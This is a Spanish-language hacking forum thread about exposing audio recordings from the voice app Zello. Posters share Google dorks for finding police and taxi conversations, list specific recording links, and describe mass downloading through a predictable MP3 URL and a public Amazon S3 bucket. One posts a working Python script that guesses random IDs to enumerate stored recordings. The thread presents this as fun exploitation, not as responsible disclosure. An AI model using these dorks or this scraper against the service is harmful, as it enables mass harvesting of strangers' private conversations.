Hola gente hoy les voy a hablar de una red social como whatsapp o telegram, pero es por audio o videoconferencia...
Aqui les mando el link de esta red que presume tener 120 millones de usuarios xD. Link project:
https://zello.com
(https://lh6.ggpht.com/b-M6r0i2HvA-diZldKBMcC__xpE9K1sEOOBTcmV1VZz1ze0mNT7kF9KwhnGLILSfz-E)
Lo que mola con esta red es que es totalmente insegura y uno puede encontrarse con video conferencias y audios de todo tipo, sin mas haciendo "hacking con buscadores" con google.
Dork PoC: site:zello.com/shared
68.000 audios y charlas de todo tipo, pero filtremos...
site:zello.com/shared/ policia
78 resultados entre ellos...
https://zello.com/shared/ahvab
O
https://zello.com/shared/ADnfb
PoC Taxis:
site:zello.com/shared taxy
14000 resultados...
Algunos como:
https://zello.com/shared/xoTeb
Espero que se entretengan y sed buenos!.
Saludos Rootkit_Pentester.
"Dame un buscador y movere el mundo".
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
Genial esa critica
@Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)
@Rootkit_Pentester (https://underc0de.org/foro/index.php?action=profile;u=63386)You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Parece que se pueden obtener de forma masiva los archivos mp3 de los audios.
Para acceder al archivo en sí, solo hace falta escribir esta dirección:
Citarhttp://zello.me/get/<id>.mp3
Con un regex y un spider se podrían descargar conversaciones de forma masiva.
Genial esa critica @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173), espero otras xD. Mientras tanto cazo mi burpsuite jeje. Saludos }:)
se puede usar wget de forma recursiva
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)
Los mp3 no vienen de: zello.me sino de un bucket de Amazon ;D
Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2 tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.
Saludos colegas :D
You are not allowed to view links.
You are not allowed to view links.
Register or Login or You are not allowed to view links.
Register or Login
Tambien se puede usar wget de forma recursiva, pero...
Tengo una novedad @DtxdF (https://underc0de.org/foro/index.php?action=profile;u=71723) @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173)
Los mp3 no vienen de: zello.me sino de un bucket de Amazon ;D
Este es el Bucket xD: https://s3.amazonaws.com/zello.sharedmessages/
Pueden explotarlo haciendo los 2 tipos de tecnicas que dicen uds o usar bing o archive.org
tendran 14 audios.
Saludos colegas :D
Exacto.
Funciona de una manera muy simple:
https://s3.amazonaws.com/zello.sharedmessages/<id>
Devuelve un 200 OK si hay archivo de audio, y un 403 Forbidden si no hay archivo.
(https://s33.postimg.cc/ttmlwtaf3/Captura.png)
Los IDs, aparentemente, tienen una longitud de entre 5 y 13 caracteres alfanuméricos en mayúsculas y minúsculas.
Este es un pequeño PoC para encontrar archivos de forma aleatoria con solo 5 caracteres de longitud.
import requests
import random
def random_string():
return "".join([random.choice("qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM") for _ in range(5)])
for x in range(500):
a = random_string()
req = requests.get("https://s3.amazonaws.com/zello.sharedmessages/" + a, headers={'User-agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0'})
if req.status_code == 200:
print a + " existe. - - - - - - - - - - - - -"
else:
print a + " no existe. -> " + str(req.status_code)Y funciona tal que así.
(https://s33.postimg.cc/yr06hyez3/Captura.png)
Grande capo @Tatoluckyfox (https://underc0de.org/foro/index.php?action=profile;u=56173) te felicito por el script, creo que te lo voy a robar para usarlo como fuzzer!.
Saludos! ;).